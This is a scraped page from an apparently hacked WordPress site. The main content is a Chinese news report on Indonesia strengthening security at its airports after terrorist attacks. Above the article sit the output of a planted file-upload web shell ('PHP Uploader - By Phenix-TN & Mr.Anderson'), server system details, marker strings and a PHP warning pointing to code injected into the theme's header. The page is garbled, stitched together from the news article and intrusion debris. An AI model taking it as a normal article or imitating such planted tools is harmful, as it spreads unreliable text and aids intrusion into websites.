PHP Uploader - By Phenix-TN & Mr.Anderson
Linux iZwz91hdhujjzqy9icuvwuZ 5.4.0-31-generic #35-Ubuntu SMP Thu May 7 20:20:34 UTC 2020 x86_64
okokok/www/wwwroot/aircn/new_wordpress/wordpressokokok
Warning: Use of undefined constant itongtong - assumed 'itongtong' (this will throw an Error in a future version of PHP) in /www/wwwroot/aircn/new_wordpress/wordpress/wp-content/themes/newsbulk/header.php(29) : runtime-created function on line 1

据外媒15日报道,印度尼西亚首都雅加达上个月遭遇恐怖袭击,政府现在要加强全国192座机场的保安措施,防止极端组织“伊斯兰国”等恐怖组织再度袭击。

印尼交通部长佐南受访时指出,这些安全措施包括根据国际民航组织的标准,在所有机场设围篱、装置先进的行李X光检测机,及重新培训机场保安人员。

他说:“我们不应该等危险迹象出现才行动,我们必须预先做好准备。我们会提高全国机场的保安水准。”

恐怖分子的袭击行动已从地面延伸到空中。去年10月,伊国组织(IS)声称通过埃及机场的保安漏洞,把炸弹送上一架俄罗斯客机,导致该客机在埃及西奈半岛上空爆炸,造成机上224人全部罹难。

本月初,一架从索马里出发的客机疑遭恐怖分子的自杀式炸弹攻击,机身侧面被炸开一个洞。

这些严重威胁飞行安全的恐怖活动敲响全球民航业的警钟,而雅加达市区上个月遭枪击及炸弹攻击后,印尼当局更是不敢掉以轻心。

印尼的航空安全向来引人诟病,佐南自2014年10月出任交长后,宣布了多项新的安全条规,包括航空公司一旦涉及飞安事故,将即刻中止有关飞行路线的运作,以及设下廉价航空最低票价的限制,确保航空公司不会为降低成本而在安全问题上妥协。

不过,这一系列措施被指没有完全落实,而且朝令夕改。对此,佐南强调,这些措施依然有效。“我知道航空公司可能不高兴,但我也对他们很不满。我(出任交长)是为民服务,确保公众安全的,不是服务航空公司的。现在的挑战是如何让业者守纪律。”

根据世界银行,印尼经济过去十年高速成长,带动航空业发展。自2006年起,印尼每年的客运量增加了超过两倍,去年达约9500万人次,但庞大的客运量也令印尼的航空基础设备及监管当局疲于应付。

尽管印尼过去几年开始加强及提升航空安全,但仍面对诸多挑战,如缺乏熟练机师、地勤人员及控制塔人员、客机及配件过时或故障、大部分机场跑道过短、设备及网络不足、机场负荷量过大等。

为此,印尼政府于去年11月宣布,今年将拨出约1亿美元提升海、陆、空交通安全,是印尼独立以来最大的一笔拨款。 

来源: 中国新闻网(北京) 

作者 赵辛

发表回复